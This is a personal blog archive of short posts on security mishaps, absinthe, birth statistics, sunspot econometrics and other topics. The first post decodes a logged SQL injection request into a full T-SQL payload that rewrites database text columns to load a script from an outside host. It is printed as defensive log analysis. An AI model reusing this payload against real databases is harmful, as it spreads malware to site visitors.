Wcw - Science

SQL injection for dilletantes

wcw@bignose.org (Wcw) — Sat, 16 Aug 2008 21:41:00 +0000

xkcd.com P+C Randall Munroe

So, you're a dilettante. You let your box get rooted once. Eventually, you figure, "hey, let's upgrade!" So for the first time in a while I check logs. What do I find but some odd errors:

...ALERT - configured GET variable value length limit exceeded - dropped variable..

to which the attendant request looked like

"GET /?;DeCLARE @S CHAR(4000);SET @S=CAST(0x4445434C41.. [snip long hex] AS CHAR(4000));ExEC(@S); HTTP/1.1"

Let's translate:

DECLARE @T varchar(255),@C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name
from sysobjects a,syscolumns b
where a.id=b.id
and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C+']=['+@C+']+''">
</title><script src="http://www3.800mg.cn/csrss/w.js"></script>
<!--'' where '+@C+' not like ''%"></title>
<script src="http://www3.800mg.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

This is explained pretty well elsewhere. There is a complicated solution.

The joke here is that the solution is much easier. One, do not to install your webserver and db so stupidly they'll execute any old thing appended to a GET request. Two, consider not running SQL Server, to which this attack is specific, and not running Winders, to which malware ultimately is delivered.

I am annoyed by seeing this crap in my logs, though.

Alameda Absinthe

wcw@bignose.org (Wcw) — Sun, 30 Dec 2007 17:53:25 +0000

St. George Spirits Absinthe Verte
(Peter DaSilva/The New York Times)

After a few tries, [Lance Winters of St. George Spirits] found that grand wormwood was best used in just the first step of absinthe making, when it is infused into grape brandy along with anise and fennel and then distilled, so its bitterness could be left behind in the still. In the second step, he infused a portion of what came out of the still with lemon balm, hyssop, tarragon and other botanicals, including a much less bitter cousin of grand wormwood. Finally this flavorful infusion is mixed back into the result of the first distillation.

Pete Wells, A Liquor of Legend Makes a Comeback
The New York Times, 5. December 2007

St. George Spirits Absinthe Verte first-issue stamp (Stephanie V. W. Lucianovic, I assume)

With the doors set to open at 11:00 on a Friday morning on December 21st, we thought we were playing it safe by arriving in Alameda at 10:30. However, as there were about 160 people in line ahead of us, clearly others were playing it safer. We were in line not even 20 minutes when the line behind us snaked and bulged exponentially. When the doors did finally open at 11:00, the news came out that they were allowing in groups of 10.

Stephanie V. W. Lucianovic, The Worm Turns: Absinthe Verte
bayareabites.blogspot.com, 21. December 2007

The nearest shop to me with an allocation sold out before release, but I put my order in for an allotment and got the maximum pair. For now, the bottle on my bar and the one in my brother's luggage headed for Brazil (I think) then back to London are the only ones I've seen. Friends, neighbors and enthusiasts will have to visit for a sip until St. George gets on the horse and distills more.

Still sealed for now, so no review. I'll have to compare it to the now-well-distributed Lucid and my old standby, the made-by-a-real-distiller Segarra.

Java 2 Evil Edition

wcw@bignose.org (Wcw) — Tue, 08 May 2007 21:24:05 +0000

The Great Old Consultants worked day and night to create the great system that would come to be known as Codethulhu. They used only the most diabolical of materials: a Dell SatanicEdge sever, J2EE (Java 2 Evil Edition, not to be confused with Java 2 Enterprise Edition), and the souls of a thousand orphans. Once their work was complete, the Great Old Consultants vanished, never to be seen again.

Tried as they might, the company was unable to summon back the Great Old Consultants. This was particularly problematic because the Great Old Consultants took with them, the source code. With no source code available, there was simply no way to fix bugs and make changes to their custom, multi-million dollar software. That is, until one engineer had an idea: they could decompile the Java bytecode.

Decompiled code is not a very pretty thing. Many of the "niceties" of Java code -- comments, variable names, differentiation between FOR and WHILE loops -- are simply non-existent. And when the original code is developed by the Great Old Consultants, it becomes much worse than "not very pretty." It becomes pure evil.

Alex Papadimoulis, Classics Week: The Call of Codethulhu
The Daily WTF, 7. May 2007

Generation Z

wcw@bignose.org (Wcw) — Tue, 01 May 2007 05:29:36 +0000

US Registered Births, 1909-2004, chart P+C Political Calculations 2007

Highlights of US Registered Birth Data, 1909-2004
Generation (Years) Registered Births Peak Births (Year) Low Births (Year) Average Births
G.I. Generation (1909-1924) 46,316,000 3,055,000 (1921) 2,718,000 (1909) 2,894,750
Silent Generation (1925-1945) 55,332,000 3,104,000 (1943) 2,307,000 (1933) 2,634,857
Baby Boomer (1946-1964) 75,863,047 4,300,000 (1957) 3,411,000 (1946) 3,992,792
Generation X (1965-1981) 58,539,872 3,760,358 (1965) 3,136,965 (1973) 3,443,522
Generation Y (1982-1999) 70,125,668 4,158,212 (1990) 3,638,933 (1983) 3,895,870
Generation ??? (2000-2004+) 20,308,472 4,112,052 (2004) 4,021,726 (2002) 4,061,695

Highlights of US Registered Birth Data, 1909-2004
Generation (Years)	Registered Births	Peak Births (Year)	Low Births (Year)	Average Births
G.I. Generation (1909-1924)	46,316,000	3,055,000 (1921)	2,718,000 (1909)	2,894,750
Silent Generation (1925-1945)	55,332,000	3,104,000 (1943)	2,307,000 (1933)	2,634,857
Baby Boomer (1946-1964)	75,863,047	4,300,000 (1957)	3,411,000 (1946)	3,992,792
Generation X (1965-1981)	58,539,872	3,760,358 (1965)	3,136,965 (1973)	3,443,522
Generation Y (1982-1999)	70,125,668	4,158,212 (1990)	3,638,933 (1983)	3,895,870
Generation ??? (2000-2004+)	20,308,472	4,112,052 (2004)	4,021,726 (2002)	4,061,695

Ironman, Generations
Political Calculations, 30. April 2007

Debian nvidia-glx/xserver-xorg quick fix

wcw@bignose.org (Wcw) — Sun, 22 Apr 2007 14:52:21 +0000

Xorg log warnings and one-line fix

It is time for another in my 'dilettantes' series.

After upgrading my xserver-xorg to 1.3, I found the nvidia-glx package has a little problem which unfortunately takes down X. With trepidation, I installed the experimental distribution kernel module source, built it, and installed that distribution's version of the driver, which worked, insofar as it brought up X again.

Alas, there was a niggling bug after all.

$ egrep '^$(EE|WW)$' /var/log/Xorg.0.log.old
[snip]
(WW) Warning, couldn't open module wfb
(EE) Failed to load module "wfb" (module does not exist, 0)

It turns out that to fix this bug the experimental nvidia-glx needs a simple patch. Or, you can perform the following one-line fix and the module will load correctly.

# cd /usr/lib/xorg/modules
# ln -s libnvidia-wfb.so.1.0.9746 libwfb.so

Et voila, more system administration for dilettantes.

The quantity theory of sunspots

wcw@bignose.org (Wcw) — Sun, 08 Apr 2007 17:49:14 +0000

Annual sunspot number, 1700-2006

3.2 The quantity theory of sunspots

Now let us consider another model which hypothesizes that income is related to sunspots. Although most economists would dismiss such a theory out of hand, variants on this theme have been taken quite seriously by some, including Jevons (1884). We might refer to this theory as 'the quantity theory of sunspots'. In particular, we are concerned with the relationship between the log nominal income, y_t, and the log of accumulated sunspots, s_t.¹⁸ One way of proceeding would be to estimate the levels regression of y_t on s_t. In column 1 of table 2, we present the results of this calculation. The results of this levels regression are striking at first glance. The coefficient of s_t has a t-statistic of 17.1 and is significantly different from zero at the 1% level using the usual test procedure. The adjusted R² os 0.827, which suggests that the log of accumulated sunspots explains over 82% of the variance of the log of nominal income.

[...]

¹⁸_{Another way of stating this theory is that the rate of growth of income is affected by the level of sunspots. Therefore, the level of income is determined by total sunspots since 1897. The data are monthly averages for the year and are taken from Jabobs (1960).}

Plosser, C. and Schwert, W., Money, Income and Sunspots (PDF, 1.0 MB)
Journal of Monetary Economics, November 1978

Cumulative annual sunspot number, 1700-2006

Closer inspection, however, reveals that the residuals in this regression are highly autocorrelated (r₁=0.90). In the second column we include a time trend variable and find that the coefficient of s_t falls substantially, but it is significant at the 10% level based on a conventional t-test. The time trend coefficient is positive and has a very large t-statistic, indicating that the trend in both income and accumulated sunspots may be an important omitted variable in the levels regression; however, the residuals from the time trend model are highly autocorrelated.

The Cochrane-Orcutt model estimates are given in column 3. Note that ρ₁ is very near 1 and that the coefficient of s_t is reduced, and no longer different from zero at the 10% level of significance.¹⁹ Similar conclusions are reached about the effect of accumulated sunspots on income from the first differences regression of Δy_t on Δs_t (column 4), or the second differences regression of Δ²y_t on Δ²s_t (column 5), where the latter model is probably an overdifferenced model. Therefore, it is once again apparent that conclusions drawn from a model with residuals that behave like a random walk are often far more misleading than conclusions drawn from a model with residuals which display the characteristics of overdifferencing.

Plosser, C. and Schwert, W., Money, Income and Sunspots (PDF, 1.0 MB)
Journal of Monetary Economics, November 1978

A worthy lesson.

Unless you think income is related to accumulated sunspots.

Chevrons, craters and tsunamis, oh my

wcw@bignose.org (Wcw) — Sun, 19 Nov 2006 19:15:54 +0000

The Fenambosy chevron near the tip of Madagascar

About 900 miles southeast from the Madagascar chevrons, in deep ocean, is Burckle crater, which Dr. Abbott discovered last year. Although its sediments have not been directly sampled, cores from the area contain high levels of nickel and magnetic components associated with impact ejecta.

Burckle crater has not been dated, but Dr. Abbott estimates that it is 4,500 to 5,000 years old.

It would be a great help to the cause if the National Science Foundation sent a ship equipped with modern acoustic equipment to take a closer look at Burckle, Dr. Ryan said. “If it had clear impact features, the nonbelievers would believe,” he said.

But they might have more trouble believing one of the scientists, Bruce Masse, an environmental archaeologist at the Los Alamos National Laboratory in New Mexico. He thinks he can say precisely when the comet fell: on the morning of May 10, 2807 B.C.

Dr. Masse analyzed 175 flood myths from around the world, and tried to relate them to known and accurately dated natural events like solar eclipses and volcanic eruptions. Among other evidence, he said, 14 flood myths specifically mention a full solar eclipse, which could have been the one that occurred in May 2807 B.C.

Half the myths talk of a torrential downpour, Dr. Masse said. A third talk of a tsunami. Worldwide they describe hurricane force winds and darkness during the storm. All of these could come from a mega-tsunami.

Of course, extraordinary claims require extraordinary proof, Dr. Masse said, “and we’re not there yet.”

Sandra Blakeslee, Ancient Crash, Epic Wave
The New York Times 14. Nov. 2006

Viva Sawzall!

wcw@bignose.org (Wcw) — Wed, 08 Nov 2006 02:34:36 +0000

You want reciprocating/sabre/sawzall stories, you got 'em.

So, there I am in the early '90s, see, living in a converted garage space (2400 sq feet, cement floor, rollup door, builtin lofts) with a couple roommates, including a kid whose father was a sleazy contractor of some repute. One day he finds a parking meter loose in the sidewalk cement, so he hoists it, brings it home, sticks a metal-cutting blade in the Sawzall, and voila -- $40 in change! The change, for the record, was actually in a hard plastic cylinder housing within the metal, but the saw went through that like butter. The metal actually took a while.

He was 19, maybe. You can't blame him for repeating this trick every time he found a loose parking meter. The noise of such a saw cutting through the surprisingly limp metal housing of a parking meter became a regular accompaniment to our afternoons of drinking beer and avoiding all pretense of responsibility. Good fun had by all, punctuated by splashes of small change on oily cement flooring.

One day we were meeting for breakfast, and he saw such a meter. "Hold on," he said, hoisted it out of the sidewalk, and turned back to his late-'60s VW bus, meter slung jauntily under one arm.

It helps at this point in the story to know we lived in Oakland and were eating breakfast in Berkeley.

A crusty, disheveled old fellow on the sidewalk looked up at him and sees what he is doing. "Spare change?" he croaks out hopefully.

"Steal your own damned parking meter," is the hardhearted reply.

Wcw, It Doubles as a Saw Horse, 3. Nov. 2006

More programming for dilettantes

wcw@bignose.org (Wcw) — Sun, 24 Sep 2006 23:40:41 +0000

The above snippet plus Gnumeric plus Eddelbuettel's crib sheet should be enough to fetch a reasonable amount of very basic data on US equities from the good graces of Yahoo Finance into your gnome-office spreadsheet.

Error handling and any not-purely-numerical responses are left to the reader.

Python code snippet

def func_yfd(ticker, code):
        url = "http://quote.yahoo.com/d/quotes.csv?s=" + ticker + "&f=" + code
        urlData = urllib2.urlopen(url)
        dataLine = urlData.readline()
        numericRegex = r"(\d+\.\d+)"
        numericMatch = re.search(numericRegex, dataLine)
        datum = float(numericMatch.group(1))
        return datum

Name ist Schall und Rauch, umnebelnd Himmelsglut

wcw@bignose.org (Wcw) — Sun, 27 Aug 2006 16:40:42 +0000

Grigory Perelman, the Russian who seems to have solved one of the hardest problems in mathematics, has declined one of the discipline's top awards.

BBC News, 22 August 2006

Perelman repeatedly said that he had retired from the mathematics community and no longer considered himself a professional mathematician. He mentioned a dispute that he had had years earlier with a collaborator over how to credit the author of a particular proof, and said that he was dismayed by the discipline’s lax ethics. “It is not people who break ethical standards who are regarded as aliens,” he said. “It is people like me who are isolated.” We asked him whether he had read Cao and Zhu’s paper. “It is not clear to me what new contribution did they make,” he said. “Apparently, Zhu did not quite understand the argument and reworked it.” As for Yau, Perelman said, “I can’t say I’m outraged. Other people do worse. Of course, there are many mathematicians who are more or less honest. But almost all of them are conformists. They are more or less honest, but they tolerate those who are not honest.”

Sylvia Nasar and David Gruber, The New Yorker

Name ist Schall und Rauch,
Umnebelnd Himmelsglut.

Johann Wolfgang von Goethe, Faust: Der Tragödie erster Teil

A PHP trick for dilettantes

wcw@bignose.org (Wcw) — Wed, 16 Aug 2006 05:40:50 +0000

So, say years ago you spent a few hours to make your record collection searchable with PHP and Postgres. A dabbler, a dilettante, you do the bare minimum and don't worry about PHP security or take the advice to use POST instead of GET.

Then let's say you start noticing POSTs in your logs. Submitted POST variables, though, do not of themselves show up. Recently rooted, you perhaps would like to see those variables. SQL injection attempts?

Google just sends you to a pay site, so with a sigh I went to the docs and wrote the single-line solution visible above. If there is a POST array, then

error_log(http_build_query($_POST));

error_log() logs its input to apache's error log, and http_build_query() turns the POST array into something easy to read.

Two builtin functions, one line, and voila. Maybe someday this post will come up in another dilettante's search for the same solution.

The punchline? Here is the first log extract for this symptom:

[Tue Aug 15 19:59:15 2006] [error] search_term=senior+sex+gallery&fst=A

Holy hannah, that's anticlimactic.

[insert bad-joke drum sound here]

Comments spam

wcw@bignose.org (Wcw) — Sat, 29 Jul 2006 20:54:50 +0000

Yesterday I got my first comments spam, three in fact, posted from an IP registered to the East Midlands Broadband Consortium ("Internet access for schools") and promoting a surfeit of dull-sounding quadruple- (yes, quadruple) x sites all at a domain, this registered to what are undoubtedly standup Russian business people whom I would not presume to annoy.

Luckily, no readers saw said comments spam, since Serendipity ships with some reasonably clever antispam measures plugged in by default.

Woo, er, hoo.

Update

Hee, hee, hee: the failed comments just got hit by an IP that resolves as ns.[dull-sounding quadruple-x domain].com. Oh, how transparent!

On the downside, I may have pissed off some Russians.

Save me.

Update 2 7. August 2006

The IP hall of shame for attempted comments spam on this lone post alone (which should warn me off entitling notes Crack spreads, huh?) now includes:

And the hits just keep coming, too. Whew.

NB, update from Crack spreads

Rooted

wcw@bignose.org (Wcw) — Tue, 25 Jul 2006 22:46:41 +0000

bignose.org was rooted, probably around 2AM Pacific on 13. July 2006. Intrusion almost certainly was due to my own sloppiness. I am reasonably certain that my open ssh port, guessable passwords, and laxness in checking logs allowed someone using the brutessh2 script to get in.

It's pretty galling to fall prey to a braindead brute-force attack.

Despite my installation of Debian likely having been secure but for its mildly inept administration (read: me), I have installed OpenBSD nevertheless. While my passwords are no longer guessable, I have also turned off ssh password authentication entirely in favor of the much-superior public-key alternative.

If nothing else, it keeps this stuff out of my log files.

The gas, meanwhile, blows up

wcw@bignose.org (Wcw) — Tue, 25 Jul 2006 19:59:16 +0000

NB - originally posted 20060530

Perhaps the most unnerving derivative I know of is fluorine perchlorate. That one was reported in 1947 (JACS 69, 677) by Rohrback and Cady. It's easily synthesized, if you're tired of this earthly existence, by passing fluorine gas over concentrated perchloric acid. You get a volatile liquid that boils at about -16 C and freezes at -167.3, which exact value I note because the authors nearly blew themselves up trying to determine it. The liquid detonated each time it began to crystallize, which is certainly the mark of a compound with a spirited nature.

The gas, meanwhile, blows up given any chance at all - contact with a rough surface, with tiny specks of any type of organic matter, that sort of thing. The paper notes that it has "a sharp acid-like odor, and irritates the throat and lungs, producing prolonged coughing". My sympathies go out to whichever one of them discovered that.

- Derek Lowe, In The Pipeline